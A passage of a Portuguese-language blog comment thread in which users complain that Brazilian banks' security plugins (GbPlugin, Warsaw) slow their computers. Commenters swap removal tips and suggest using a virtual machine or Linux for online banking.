    Em algum momento ele passa e se comportar como uma carroça e não á processo a 100% ou acesso a disco no talo visíveis como sendo o motivo, não por ferramentas normais (não fui a fundo sobre isso).

    No Windows 8.x o problema fica pior ainda.

    Então teoricamente se eu remover qualquer plugin de banco a máquina ficará como deveria?

    Sinceramente se for isso vou passar a ter uma máquina virtual só para acesso a bancos.

    E olha que nem instalei essa miséria da IBM.

    • VR5 - 397 Comentários
      24/02/2015 at 14:50 · Responder

      Richardson: verifique se nas propriedades de sua placa de rede não existe nada da GAS tecnologia. Se tiver, DESMARQUE! Não afeta em nada os bancos e o computador ficará bem mais rápido!

      • Richardson - 9 Comentários
        24/02/2015 at 15:22 · Responder

        Opa, essa aí é nova, eles “engatam” esse treco no tráfego da placa de rede? Aí não tem jeito mesmo.

        Uma coisa que acho muito suspeita também está relacionada a rede e acesso a disco, não consigo monitorar pois acho que num nível mais baixo, mas minha rede no computador é muito instável, tentei até achar drivers mais recentes mas nada resolveu.

        Outra coisa que acontece quando baixo “to..ent”, a placa de rede pára de responder, mas é estranho que só resetando o roteador para voltar a funcionar. Não é a questão do uso paralelo é algo local no notebook.

        Já sobre acesso a disco eu ainda acho que há em alguns casos de acesso “não autorizado”, processo que usa o disco sem necessidade.

  • Richardson - 9 Comentários
    24/02/2015 at 15:24 · Responder

    Para somar aos comentários de soluções de segurança de bancos.

    O banco aqui do estado adota uma solução diferente, mas ainda assim tenho minhas dúvidas pois tem um arquivo na pasta do GbPlugin que parece ser deles.

    Ele trabalha com certificado digital ou algo assim atrelado ao IE, uma solução com Java também, uma jaca, sempre consulta algum servidor, congela um tempo e então pipoca para digitar senha de acesso, fora o trabalho que dá ficar exportando e importando certificado (arquivo com o certificado).

    Fora ainda que segundo a lenda funciona em Chrome e Firefox, só o IE era garantido, mas nunca funcionou antes e agora dizem que funciona, fora ainda a versão do Java, tinha-se que manter uma versão antiga do Java para funcionar, ou seja, o já furado Java tinha que ficar lá, se atualizasse já era, me parece que melhoraram pois é possível usar uma versão mais recente do Java não sei qual número pois não arrisco atualizar para uma muito nova.

  • Richardson - 9 Comentários
    25/02/2015 at 9:50 · Responder

    Ontem corri para fazer o teste no meu notebook…

    O negócio do driver do GAS integrado à placa de rede pesquisei que somente ocorre no Windows XP, não é o meu caso.

    Removi tudo de tudo do GBPlugin, primeiro pelo boot com o Hirens, depois limpando o registry.

    É um pouco cedo para dizer se é efeito placebo, mas parece que houve um ganho de perfomance considerável, além de menor ocupação de memória. Vou começar a avaliar hoje quando utilizar o notebook pra valer.

  • Jefferson - 6.606 Comentários
    27/02/2015 at 2:27 · Responder

    Aconteceu de novo. A cliente tem um Core i3 com 4GB de RAM e apesar do consumo de CPU ficar por volta dos 4%, as animações das janelas ocorriam em câmera lenta. A cliente também reportou que usar o Google Maps para traçar uma rota era praticamente inviável de tão lento. Como essa cliente já tivera um problema com o gbplugin e passou de um Sempron pra o i3 justamente para poder continuar usando o banco, desta vez a primeira e única coisa que fiz foi dar boot por um LiveCD e apagar os diretórios da GAS. Não fiz mais nada além disso, nem mesmo mexer no Registro. Os problemas da máquina imediatamente desapareceram. Eu queria mostrar à cliente novamente (da vez anterior eu já havia demonstrado isso) que os plugins de segurança do BB eram a fonte de todos os seus problemas.

    Como dessa vez era absurdo dizer à cliente que precisava fazer um upgrade (eu acho aceitável que um Sempron seja aposentado, mas não um i3) decidi explicar a ela como usar uma máquina virtual só para acessar os bancos. Como eu já tinha a máquina virtual pronta no meu kit o processo todo de instalar o Virtualbox, a máquina virtual, os plugins dos bancos nela e explicar o básico não levou mais que uma hora.

    A cliente ficou satisfeita com o resultado.

    É bom notar que se o Sempron dela pudesse rodar uma máquina virtual satisfatoriamente eu nem teria sugerido o upgrade para o i3. Mas hoje em dia até o Chrome implica em não atualizar se você estiver usando um Sempron.

    • Ayrton - 1 Comentário
      28/02/2015 at 16:27 · Responder

      Jefferson, tenho o mesmo problema em inúmeros clientes e faço o mesmo procedimento. Mas o trabalho adicional e a insatisfação é grande. A gente tem que ser ressarcido pelos prejuízos! Estou contratando mais um técnico por conta disso!

  • Richardson - 9 Comentários
    27/02/2015 at 8:43 · Responder

    Jefferson, comprovei, não foi efeito placebo, realmente o desempenho do computador virou outro, ainda não tão quanto esperado, mas agora consigo trabalhar.

  • João - 1 Comentário
    27/02/2015 at 17:08 · Responder

    Alguém sabe dizer se o tutorial do Márcio Amorim (25/10/2014) funciona mesmo. Poucos disseram que sim, mas depois ninguém mais comentou/recomendou, então fiquei na dúvida.
    Ajuda, por favor, pois meu note ficou a tal carroça, e o SAC do BB me pôs para falar com pessoal técnico em Brasília, e lá me recomendaram reclamar com meu provedor, pois deve ser ele que está bloqueando meu acesso ao banco. Pode?! Disseram que o módulo de segurança não tem problema algum. Uns 3 anos atrás deu o mesmo problema, e liberam atualização do plugin. Mas agora…
    Obrigado a todos que tentam ajudar.
    João

  • Cil - 2 Comentários
    06/03/2015 at 16:22 · Responder

    Mais uma com problemas com esses malditos. Tinha um Pentium dual core que ficou lento. Totalmente esqueci desses plugins e acabei comprando um novo micro, um i3 com 2 gb de ram e win8. Óbvio que nessa config com Ruindows 8 não rolou nem o sistema com o básico (office, comodo firewall e avast). Como não gostei do 8, fiz downgrade pro 7, já que ia ficar com uma licença dando sopa e achei que tudo ia melhorar. Ledo engano. Troquei de antivirus e firewall, desinstalei uns programas e desabilitei serviços… e nada. Até que decidi desabilitar os plugins no Firefox. Aí surpresa… a cada site que abria, o plugin queria ser executado. Como assim? Minha navegação é vigiada? Fiquei irritadadíssima. Desinstalei tudo e vou partir pra máquina virtual, já que as versões completas de sites de banco que uso não estão disponíveis nos sistemas móveis. Um negócio estranho é que a desinstalação das chaves no registro implicam em você virar proprietário e ter controle total, porque até isso é negado. Um absurdo estes softwares de scam, virus e spywares serem instalados nos computadores. Vou reclamar no Banco Central ainda.

  • Cil - 2 Comentários
    06/03/2015 at 16:24 · Responder

    Só pra informar. Minha máquina está funcionando perfeitamente sem o crapware dos bancos instalados… e eu já estava avaliando comprar outro pc. Evitei um preju de 2 mil.

  • Guilherme - 1 Comentário
    19/03/2015 at 14:35 · Responder

    Uso apenas no celular, a “GAS Tecnologia” toma conta do seu computador com Windows, você é constantemente espionado por esse malware que tem permissão para fazer o que bem entender no Windows, inclusive utilizar técnicas dignas de malwares/trojans/virus para se camuflar no sistema e evitar desinstalações. Você confia na GAS Tecnologia a ponto de abrir a porta do seu PC para eles? Eu não.

  • VR5 - 397 Comentários
    20/03/2015 at 7:30 · Responder

    Gozado que essas coisas nenhum deputado, senador, etc. vai atrás e vê o que é isso… e nem a desculpa de falta de conhecimento técnico cola, pois ele poderia ter algum assessor com esse conhecimento (eu me proponho! rsrsrs)…

  • Valdemir - 1 Comentário
    26/03/2015 at 7:35 · Responder

    Bom dia à todos!
    Alguém saberia me dizer o porquê do warsaw de uma hora para outra começou a bloquear a entrada em pastas compartilhadas (rede Microsoft, IP’s fixos nas máquinas, DHCP do modem de acesso à internet). Quando clicava no nome da máquina na rede (grupo de trabalho) ele pedia nome de usuário e senha para entrar (marcava a opção de guardar nome de usuário e senha para não pedir mais e facilitar a entrada novamente no micro em questão).
    Agora clico na rede e depois clico no nome da máquina, ele não conecta (não consegue acessar o micro escolhido) e dá até msg de erro (caminho de rede não encontrado, etc). Já verifiquei cabos, ninguém alterou as senhas, nome dos usuários ou das máquinas.
    Ponto importante, quando desinstalo o warsaw tudo volta a funcionar normalmente até que ele se reinstale sozinho após uma reinicialização, reset da máquina ou tente acessar banco.
    Quando não desinstalo o warsaw, só vai reconectar com o micro escolhido, se eu for nas senhas registradas no Windows e deleto o usuário e senha gravado na máquina. Tento reconectar e coloco novamente o usuário e a senha, Dá para fazer o acesso mas já na sequencia volta a travar tudo novamente. Outra opção (Sem remover o warsaw) é mudar a senha do usuário da máquina que desejo conectar e repetir o processo de exclusão de senha armazenada e tentar novo acesso pela rede colocando o nome do usuário ou convidado e senha, mas após tentar uma nova conexão, trava o acesso ao micro.
    Se alguém tiver alguma sugestão, agradeço a ajuda para resolver em definitivo esse problema.

  • Joao Marcos - 1 Comentário
    31/03/2015 at 10:13 · Responder

    Nem vou ler que todos estão comentando aqui

    NOTEI 2 COISAS

    PRIMEIRO : O ANTIVIRUS * AVG BLOQUEIA O ACESSO A NET JUNTO AO PROGRAMA DO BANCO(WARSAW)
    SEGUNDO : SEM O ANTIVIRUS , O PROGRAMA WARSAW FUNCIONA, POREM FICA IMUNE !

    A solução …

    PAINEL DE CONTROLE > DESINSTALAR UM PROGRAMA > REMOVA O WARSAW .

    Simples E RAPIDO !

  • Gustavo - 1 Comentário
    02/04/2015 at 15:43 · Responder

    Boa tarde a Todo !!! Então vamos para mais um problema !!! Tenho 4 situações iguais em 3 clientes difetentes. Os micros são novos e de configurações excelentes. Rodando win7pro 64bit. Rede ponto/ponto do Windows e tb Win2008. Após formatação ( em todos eles ), preparação geral para o uso e configura-los na rede, tudo funcionou perfeito. Foi só instalar as seguranças do Banco eles perderão o acesso as pastas compartilhadas de rede. Isso serve para o ( Bb, Caixa, Itaú ), e hj constatei o Santander…pois bem e o que fazer…estou há mais de 20 dias tentando achar uma solução…obrigado Desenvolvedores da niva geração, que só pensão no próprio umbigao..e agora?! Fica formatando…testando…perdebdo tempo pra solucionar o problema?! Quem nos ressarci, nós que somos a classe que mais se F…na informática!? Os técnicos em Informática…alguma solução?????

  • Lauro - 2 Comentários
    09/04/2015 at 10:35 · Responder

    Eu sempre tive problema com instalação desses plugins/módulos e todas essas palhaçadas, já optei por abandonar todos os navegadores e só usar o Fire Fox, mas desta vez a situação está complicada. Lembro-me de ter desinstalado esse tal de rapport pois ele come mais processos que o próprio chrome, mas instalei-o novamente após apagar permanentemente todos os registros e diretórios do gbplugin.
    Pra vocÊs terem uma ideia, quando acessava pelo IE e pelo chrome ele informava que eu não tinha instalado o módulo de segurança, quando eu instalava a porcaria do módulo ele sempre dava o bendito erro do stormfish mesmo que funcionasse “normalmente” no firefox.
    Agora quando aceso pelo FF ele simplesmente CRASHA sem mais nem menos, agora que apaguei todos os registros do gbplugin e re-instalei ele abre o site mas informa que preciso intala-lo
    QUANDO ABRO ESSA PÁGINA EM TODOS OS NAVEGADORES ELE EXIBE O ERRO
    “500 Internal Server Error
    nginx”
    ME RESPONDAM ISSO ACONTECE COM VOCES TAMBEM???

  • Rock Carvalho - 2 Comentários
    09/04/2015 at 10:57 · Responder

    Lauro, abri seu link normal, não deu esse erro. Estou usando o firefox 37.0 – ultimo.
    Recomendo utilizar uma ferramenta anti spyware. Eu utilizo o spyboot search and destroyer – é FREE. Baixe ele e antes de usar a imunização, faça a update.
    depois é so mandar imunizar e scannear o computador, com certeza ele vai achar um monte de spy…sempre acha porque hoje em dia ta uma caca essa internet… virus e spyware por todo lado.

    Espero ter ajudado
    Abraço

  • Richardson - 9 Comentários
    09/04/2015 at 11:00 · Responder

    Para quem tem conhecimento técnico o ideal agora é realmente manter uma máquina virtual básica apenas para internet banking, ou seja, a grande minoria.

  • JOÃO TEIXEIRA - 1 Comentário
    09/04/2015 at 11:46 · Responder

    Uso o BB para pagamentos de titulos mas na hora de imprimir o comprovante o bixo pega. Muito lento. Ridiculamente lento.
    Tem momentos em que demora mais de um minuto para imprimir. Será que é devido ao IBM TRUSTER?

  • Lauro - 2 Comentários
    09/04/2015 at 18:01 · Responder

    Era problema do site mesmo.
    Mesmo assim desisti, agora só pelo celular mesmo.
    Apaguei rapport e plugingb do pc

  • Raphael - 3 Comentários
    10/04/2015 at 14:25 · Responder

    Acesso seguro a bancos e instituições financeiras:
    ****************************************************
    O ideal mesmo é utilizar uma máquina Linux em CD ou Pendrive USB e acessar o site de bancos por ela. Assim não corre o risco de vírus, pois a cada vez que for entrar o sistema operacional vai estar sem alterações.
    http://www.pendrivelinux.com/liveusb-install-live-usb-creator/
    http://www.oficinadanet.com.br/post/14108-a-forma-mais-segura-para-acessar-um-site-de-banco
    Assim vcoe pode acessar de qualquer máquina, em cybercafes, em sua casa, em casa de amigos, etc., pois o sistema operacional estará sempre sendo o mesmo que está gravado no seu CD Live Linux ou Pendrive Live Linux.
    ***********************************************************
    Outra:
    E atualmente a página do http://www.bb.com.br está com um malware no link de Educação Financeira e que foi examinado conforme abaixo.
    https://www.virustotal.com/pt/url/93f2e9390156f945ed76ea20f0a53cef0ed8fd0f48845372738d24138b90f703/analysis/
    Análise de URL Resultado
    Baidu-International Phishing site
    Fortinet Phishing site
    Netcraft Malicious site
    Opera Malicious site

    *********************************
    E tem mais outra: Se voce usar o Firefox para acesso a sua conta do BB vai reparar que o certificado não mais é exibido, significando que o seu acesso não é mais criptografado. Só não acontece esse problema se usar o IE. Estranho não?
    No firefox:
    https://www2.bancobrasil.com.br/aapf/login.jsp?aapf.IDH=sim&perfil=1
    No IE:
    https://www2.bancobrasil.com.br/aapf/login.jsp?aapf.IDH=sim&perfil=1

    • Jefferson - 6.606 Comentários
      11/04/2015 at 23:40 · Responder

      Não, o site do BB não está “com um malware no link” de educação financeira. Nem mesmo está “com um link para um malware”.

      Primeiro, esse relatório do Virustotal indica que o problema está em um site chamado http://www.educacaofinanceirabb.com.br/. Se o BB tem um link para ele, não significa que o site do BB “tenha um malware”. “http://www.educacaofinanceirabb.com.br/” não é um arquivo hospedado no site do BB.

      Segundo “Phishing site” não implica que o site tenha qualquer malware. Apenas significa que o site foi reportado como falso um número suficiente de vezes. O que não é de se estranhar, afinal a idéia de uma empresa conhecida qualquer criar múltiplos sites já não é sábia. Quando se trata de uma instituição financeira, é uma impressionante estupidez. Qualquer pessoa chegando a http://www.educacaofinanceirabb.com.br/ e vendo o logo do BB vai ter como primeiro impulso reportar como um site falso, porque a medida sábia seria criar um site do tipo http://www.bb.com.br/educacaofinanceira/ ou http://educacaofinanceira.bb.com.br

      Quanto ao problema do Firefox, você notou que funciona com o Chrome, não notou?

  • Raphael - 3 Comentários
    12/04/2015 at 13:10 · Responder

    Caro Jefferson
    Concordo que os arquivos maliciosos podem realmente não estar no domínio do site http://www.bb.com.br
    Mas o simples fato de existir um “link apontando” para um endereço que provoque esse tipo de resposta é no mínimo preocupante, em sendo um site de uma instituição financeira.
    O Kaspersky reporta isso como site não confiável e por isso nem me arrisco a entrar nele com windows (com linux poderia até me arriscar).
    Acho que a instituição financeira deveria corrigir isso, para evitar de ter sua reputação arranhada.
    Uso Windows e Linux, cada um para uma objetivos diferentes.
    E quanto ao navegador Chrome, já o instalei nas máquinas windows e linux e não tenho “paciência” de ter de reaprender a usá-lo, pois é diferente seu uso do Firefox, que uso há bastante anos. O IE só o tenho na máquina windows por razões de compatibilidade de sites. Na verdade para acesso ao internet banking gosto de usar o Firefox no LINUX.(com um bom firewall, claro).
    Por essas razões pessoais não o uso (Chrome) e muito menos para acesso a sites financeiros.
    E o fato de um produto estar sendo muito utilizado não me é referencia de sua segurança e qualidade, senão o Windows seria o sistema operacional mais seguro e isso é justamente o contrário e todos sabemos porque. Outro exemplo, o carro Gol ou Palio são os mais vendidos no Brasil e nem por isso são os carros mais seguros ou melhores em qualidade, muito pelo contrário.
    E além disso, porque o BB ainda não teria resolvido a questão com um navegador (Firefox). Estranho isso não acha?
    Att.

    • orlando cunico santana - 1 Comentário
      20/04/2015 at 20:54 · Responder

      Raphael, como é que voce consegue usar o internet bank no linux com firefox, pois o meu nao pede mais para instalar os pluglins de segurança parece que o banco vai trabalhar com o sistema de liberaçao do computador pelo celular, o problema é que o campo para preenchimento do n. do celular tem 8 digitos e meu celular cadastrado no banco tem 9 digitos. O mais interessante é que o suporte tecnico do banco falou que eu estou com um trojan no computador embora rodando num hd formatado para linux que fiz so para isso,(fiz pelo pendrive tambem), me orientou fazer uma analise de seguranca num endereco http:/seg.bb fornecido pelo atentende que ate agora nao me enviou o resultado pelo email segundo prometido. Independente de eu achar que eles estão perdidos, o fato é que eu gostaria de acessar o BB pela internet.
      Estou a dois meses tentando, e passando pelos problemas ja relatados acima.
      Se alguem puder dar uma luz, estou quase desistindo e fazendo o que eu não queria, usar o banco pelo celular, que acho menos seguro.

      • Raphael - 3 Comentários
        21/04/2015 at 0:15 · Responder

        Orlando,
        Uso uma máquina virtual Linux Ubuntu 13.10 e acesso diretamente pelo Firefox que veio instalado.
        Quando acessar a página do BB ele vai pedir o java e eu precisei instalar o “IcedTea Java Plugin” (plugin java do firefox do Ubuntu) pelo Ubuntu Software Center.
        E quanto a questão de numero de celular com oito digitos, ou voce entra em contato com o telefone 0800 da area de segurança do BB (veja na pagina http://seg.bb.com.br) ou tenta usar o telefone de alguma pessoa muito confiável (se bem que depois de digitado o código enviado pelo BB, voce pode apagar a mensagem pois ela não serve mais para nada) e que seja de celular de área com oitos digitos, para desbloquear. No meu caso meu celular é de oito digitos e liberei meu acesso pelo linux.
        Converse isso com o gerente e solicite uma solução pontual para o seu caso. Ou então cadastre seu numero de celular de nove digitos com seu gerente na agencia e depois o sistema vai enviar a mensagem para esse numero quando voce acessar sua conta pelo linux. Tente isso.
        A questão do Firefox não reconhecer o certificado do BB para acesso a conta corrente só ocorre no Firefox for Windows. No IE e no Chrome isso não acontece. Não gosto do Chrome (não estou a fim de reaprender a usar outro navegador pois teria de procurar e instalar as extensões favoritas que uso o Firefox, que muito me são úteis) e no IE não confio como navegador. Tenho o IE na máquina, pois é instalado pelo windows e por razão de compatibilidade no acesso a certos sites que só rodam ActiveX (sites de concessionárias de energia eletrica, por exemplo)
        Para acesso financeiro acabo usando o Linux com Firefox.
        Para outros acessos acabo usando o Firefox no Windows 8 Pro com Kaspesky Pure 3.0 totalmente ativado e atualizado e Advanced Systema Care atualizado. Ao final de cada sessão no windows escaneio a máquina com o Advanced e rodo a verificação do Kaspersky nas área críticas. Sabe como é windows…temos de estar sempre atentos a segurança…
        Banco pelo celular? Considero não tão seguro, e só uso o aplicativo para ver extratos na conta e não autorizo o celular para nenhuma transação financeira. E mesmo asism uso um app de bloqueio que pede senha para acessar o aplicativo BB no celular.
        Att.

  • Branco - 1 Comentário
    31/05/2015 at 7:20 · Responder

    Quando instalei este “plugin” do BB. Percebi a lentidão nos navegadores e sites que não abriam. Então, abri o “msconfig” e desativei o serviço “Warsaw” e resolveu.

  • Raphael Ventorim - 1 Comentário
    03/06/2015 at 22:46 · Responder

    Olá Jefferson, interessante este artigo, criei até um tópico no ano passado com uma dica para usuários do BB no fórum do clube do hardware:
    http://forum.clubedohardware.com.br/topic/1085915-dica-para-usuários-do-internet-banking-bb/

  • Rafael - 1 Comentário
    10/06/2015 at 9:58 · Responder

    Malwarebytes resolve ou combofix. infelizmente e muito problemático o uso do modulo de segurança do bb, o pc fica extremamente lento mas e a única saída para utilizar o bb, o que eu não entendi foi um problema que tive para acessar o bb e só consegui resolver na minha empresa quando resetei meu roteador ficou normal o carregamento da pagina queria saber se alguem ja teve algum caso parecido???

  • VR5 - 397 Comentários
    18/06/2015 at 16:43 · Responder

    Atenção! Começou hoje: uma atualização do AVG Security Edition (estranhamente só essa) em micros com o plugin do BB faz as máquinas trancarem e se a gente reinicia pelo botão “reset” as mesmas não conseguem mais carregar o Windows. Solução (por enquanto): entrem em modo de segurança, desinstalem o AVG e coloquem outro (ou outra versão do mesmo). A AVG está avisada mas até o momento que digito isso não tem nenhuma solução…

    • VR5 - 397 Comentários
      24/06/2015 at 19:44 · Responder

      Atualizando: não era nada com o AVG: era o truster report do Banrisul (banco que do RS) que estava baleado…

  • Rodrigo Bats - 1 Comentário
    30/06/2015 at 15:19 · Responder

    Não consigo deletar a pasta GBPlugin por nada. Nem com ajuda do Unlocker.

  • Carlos - 1 Comentário
    20/07/2015 at 22:23 · Responder

    Quando tento deletar a pasta GBPlugin, aparece a seguinte mensagem:

    “Não é possível excluir bb.gpc. Ele está sendo usado por outra pessoa ou programa”.

    O que fazer?

    • Daniel - 29 Comentários
      22/07/2015 at 8:50 · Responder

      Carlos, já experimentou entrar em modo de segurança, ou fazer boot com um livecd linux e ai então ir apagar os arquivos?

      • Carlos - 3 Comentários
        30/07/2015 at 18:59 · Responder

        Tentei deletar a pasta GBPlugin no modo de segurança, mas surgiu a mensagem “Não é possível excluir bb.gpc. Ele está sendo usado por outra pessoa ou programa”.

  • Arthur - 1 Comentário
    26/07/2015 at 12:39 · Responder

    Fiz a desinstação completamente com o Revor Uninstaller Pro

    • Carlos - 3 Comentários
      30/07/2015 at 19:02 · Responder

      E qual programa você pediu para o Revor Uninstaller Pro desinstalar? Warsaw? Stormfish?

      No meu caso, quero apenas apagar a pasta “GBPlugin”, então não sei se seria possível fazer isso com o Revor Uninstaller Pro.

  • Plínio - 1 Comentário
    27/07/2015 at 14:55 · Responder

    Estou deixando de usar o pc para acessar páginas de bancos por causa deste plugin, a um tempo a trás o warsaw estava provocando o sequestro de páginas acessadas por mim, algo muito estranho, do nada a página ficava fora do ar, as vezes por alguns minutos. Se querem minha segurança que seja de uma forma honesta, mas não sequestrando as minhas informações de acesso. Deixava minha conexão lenta e as vezes sem acesso. Fora isto este relato de lentidão do pc, infelizmente no i7 não cheguei a notar tal lentidão. Para solucionar o problema segui um tutorial de um youtuber, deve-se finalizar todos os processos do warsaw.exe no gerenciador de tarefas e depois deleta o programa core.exe e renomeia um bloco de notas vazio de core.exe e coloca no local.

  • Carlos - 3 Comentários
    30/07/2015 at 19:14 · Responder

    Entrei em contato com o suporte avançado (eles chamam de “segundo nível”) do Banco do Brasil e fui informado que o Stormfish não é mais utilizado para acessar o Módulo de Segurança. Fui orientado a desinstalar o Stormfish e instalar apenas o Warsaw. E agora?

  • ruim - 1 Comentário
    31/07/2015 at 13:58 · Responder

    bem imoral isso, um programa que se instala e não opção de desinstalar.
    ate mesmo os programadores de virus tntam deixar ele sem ser notado fazendo ações leves.
    ja esse da gas só falta queimar o processador de tão pesado.
    e esse warwaw? ate agora ninguem apareceu pra dizer o que é isso nem o que faz.
    algumas pessoas dizem se um programa espiao, provavelmente o governo quer nos espionar.
    dando uma olhada nos dados enviados, em alguns momentos os sites dos bancos acessam um link de nome warsaw. mas só carregam um script de la, nao é uma pagina.
    isso é tudo muito estranho

  • Kayque - 1 Comentário
    02/08/2015 at 23:54 · Responder

    Pensei que só eu tinha notado isso, não uso mais o Chrome por causa disso, meu navegador padrão é o Maxthon, bem leve e livre de plugin e ferramentas que só atrapalham.
    Já consegui retirar esse Warsaw e afins, mas fazendo isso não tenho acesso ao banco.
    Por conta disso sou obrigado a ter isso instalado no meu computador por causa do banco do Brasil!!

  • Gabriel henrique - 2 Comentários
    07/08/2015 at 14:06 · Responder

    Depois de ter atualizado pra windows 10, o site do BB fica lento, muito lento, e depois que faço login na minha conta, ele fala que ocorreu um erro e atualiza a pagina (sempre utilizei o IE para acessar site de bancos). O site fica lento em qualquer pagina, até mesmo na página inicial. Só o site do BB fica lento, outros sites funcionam normalmente.

    As vezes o erro acontece só uma vez, e depois da atualização da pagina, dá pra “mexer” no site, apesar da lentidão. Mas ontem deu o erro seguidas vezes e o site simplesmente fechou, sem eu ter encerrado minha sessão.

    Desinstalei o módulo de segurança do bb e o warsaw pelo painel de controle mesmo, instalei novamente, e continua lento o site.

    Depois de ter reiniciado o pc após a instalação, fui abrir o IE para acessar o site da Caixa pra saber se estava funcionando normalmente, mas antes de eu digitar qualquer endereço, ele tava dando o mesmo erro de quando eu entrava no BB, falava que ouve um erro e que precisava ser fechado.

    Vou tentar desinstalar os 2 completamente pelo Revo uninstaler e instala-los novamente para ver.

    O pior de tudo é meu pai me culpando por ter atualizado pro windows 10 kkk

    • VR5 - 397 Comentários
      08/08/2015 at 9:12 · Responder

      Tentou acessar o BB por aquela navegador novo que vem no W10 (não o IE)?

      • Gabriel henrique - 2 Comentários
        10/08/2015 at 22:48 · Responder

        Não pesquisei se esse navegador é seguro. Não me arrisco por enquanto.

        • VR5 - 397 Comentários
          11/08/2015 at 7:17 · Responder

          É bem simples: se ele permitir instalar o plug-in de segurança é porque foi “homologado” pala GAS… mas creio que esse novo navegador nem aceita plug-ins (o que, convenhamos, é o mais correto: o BB e outros bancos deveriam ter sim é um app completo e independente de navegadores)…

  • Alexandre - 2 Comentários
    20/08/2015 at 21:53 · Responder

    Um absurdo esse lixo de site do BB, depois que eu instalo o virus GAS. O meu pc fca extremamente lento, em TUDO.
    Estou pensando até em mudar de banco por conta disso, mas vocês falaram que os outros Bancos Também utilizam o GAS.

  • Alexandre - 2 Comentários
    20/08/2015 at 22:02 · Responder

    Para amenizar, apenas amenizar o problema eu fiz assim:
    1- instalei o modulo de segurança pelo IE
    2- depois removi o warsaw pelo painel de controle
    3- Reiniciei o pc
    4- Instalei o JAVA no ie
    e agora consigo acessar ao banco sem o Warsaw, melhorou uns 60% a velocidade do PC, mas ainda não esta normal como era antes da instalação do virus GAS

  • Marcio - 6 Comentários
    04/09/2015 at 0:23 · Responder

    Esse GAS é um inferno. Atualizei o Windows para a versão 10 e parece que ficou pior ainda. O PC esta ok, até que precisei instalar o GAS no W10 para acessar o banco. Dai em diante, o PC ficou lento, no navegador chega a aparecer a mensagem “não respondendo” de tão lento que fica. Os vídeos no youtube parece carregam aos poucos. E qualquer janela demora segundos para abrir.

    • VR5 - 397 Comentários
      04/09/2015 at 9:09 · Responder

      Marcio: acessou o BB pelo IE ou pelo novo navegador dele? Nem sei se ele permite instalar plug-ins…

      • Marcio - 6 Comentários
        04/09/2015 at 16:42 · Responder

        Acessei pelo IE 11. O novo navegador sugere que se use o IE quando você tenta abrir o site do BB.
        Desinstalei o plugin e o PC voltou a ser como era antes. Mas e quando precisar usar de novo, vou ter que instalar o plugin e depois desinstalas, é o único jeito :(

  • VR5 - 397 Comentários
    09/09/2015 at 16:10 · Responder

    Boa tarde!
    Gostaria de saber se isso já aconteceu com vocês: há cerca de 1 semana tanto no meu PC em casa como no serviço alguns links que clico em determinados sites ao invés de abrir os links específicos estão abrindo… o site do BB (www.bb.com.br)!!! E a única coisa em comum entre o PC de casa e do trabalho é ter o bendito plugin do BB!!! Isso só acontece com o IE. Não ocorre com o Chrome (onde casualmente não tenho o plugin instalado)…

    • Marcio - 6 Comentários
      10/09/2015 at 18:36 · Responder

      Não tive esse problema, ainda…

      • VR5 - 397 Comentários
        18/09/2015 at 7:55 · Responder

        Esse último final de semana tive que trocar a fiação telefônica da minha casa (da rua para casa é subterrânea e realmente estava “podre” por causa da umidade) e daí o pessoal da GVT me “presenteou” com um modem deles. Sabe que o problema acabou quando troquei o modem? Vai entender…

        • Marcio - 6 Comentários
          19/09/2015 at 14:35 · Responder

          Talvez vc tivesse algum virus que criou um redirecionamento no seu modem antigo. Isso aconteceu comigo uma vez. Ele de alguma forma entra no firmware do modem e adiciona um endereço no DNS, e sempre que vc abre uma página, é redirecionado para este endereço.

  • george - 1 Comentário
    17/09/2015 at 10:50 · Responder

    Executei o Upgrade para Windows 10, a partir do Windows 7, e imediatamente o laptop ficou inutilizável devido à um process de sistema “winlogon” ocupando a CPU de 40% a 90% da capacidade de processamento. Depois de dois dias pesquisando em ingles qual problema poderia estar ocorrendo com winlogon ( há varios outros problemas possiveis que acabam afetando winlogon a ter alto processamento), resolvi pesquisar em portugues e muito rapidamente se acha alguns artigos na MSFT Technet sobre o Plugin GBP ou GBuster travando o computador depois do upgrade e várias outras situações. Seguindo este procedimento abaixo – me refiro ao procedimento básico no topo da pagina – consegui liberar o laptop do Plugin, e o mesmo voltou a funcionar. Independentemente da qualidade do plugin, aparentemente quando um novo sistema operacional é instalado, a nova instalação de SO entende o plugin como um malware, e todo tipo de problema ocorre. Eu havia executado um upgrade para Winsows 10 em outro computador com Sistema Operacional Win 8.1 em ingles e não ocorreram problemas. Mas com este computador que estava em Windows 7 em Portugues, ocorreu este problema. Acho que se fosse instalar o plugin novamente por cima, agora do Windows 10 , talvez fosse bem sucedido e poderia voltar a utilizar o BB normalmente, mas nesta maquina não ou mais tentar nada ….

    Como retirar o BB Plugin :
    http://chsd.com.br/index.jsp?c=Article&a=1010&id=35

    • Marcio - 6 Comentários
      19/09/2015 at 14:33 · Responder

      Eu instalei o W10 a partir do W7. Depois tive que instalar o plugin do BB e os problemas começaram. Então reinstalei o W10 e novamente precisei instalar o plugin do BB. E os problemas voltaram. Só que notei, que no meu caso, o problema não é o GBuster mas o Warsaw, que é o modulo de segurança do BB, o plugin que preciso instalar para usar o banco pela internet.
      Minha unica solução encontrada foi desinstalar o plugin e instalar quando acesso o internet bank e depois desinstalar novamente. É uma tortura, mas não tive outra solução.

  • Paulo - 1 Comentário
    22/09/2015 at 15:37 · Responder

    Olá amigos!

    Raramente faço algum comentário em blogs etc.. Mas a raiva com esse tal de warsaw me fez tomar essa atitude! Incrivel como um banco do tamanho do BB contrata uma empresa com um produto tão prejudicial. Acabo de instalar uma máquina virtual para atender um cliente, para apenas acessar o site do banco. Parece simples, mas e as atualizações? e as licenças? e principalmente o TEMPO perdido com uma coisa tão simples que é acessar o banco..

    Espero que resolvam logo essa situação.

    Abs

  • Marcelo Zola - 4 Comentários
    16/10/2015 at 15:53 · Responder

    Aí pessoal fica a dica/solução que o setor de programação de minha empresa finalmente encontrou.
    Para software proprietário, basta compilar o executável com uma Assinatura Digital e “tibum”!
    Problema resolvido!
    Por segurança o software de segurança da Caixa e do BB (são os mesmos) bloqueio executáveis sem assinatura.
    Abraços.
    Boa sorte!
    :)

    • Jefferson - 6.606 Comentários
      16/10/2015 at 16:00 · Responder

      Qual o problema é resolvido? Lentidão?
      E como o usuário vai compilar software?

      Bloqueia software sem assinatura? Como assim? Em que situação? Software sem assinatura com certeza roda nas máquinas onde o plugin do banco está rodando.

      Por favor esclareça ou eu precisarei deletar seu comentário.

      • Marcelo Zola - 4 Comentários
        17/10/2015 at 8:00 · Responder

        Jefferson o problema específico que tivemos foi com um software proprietário.
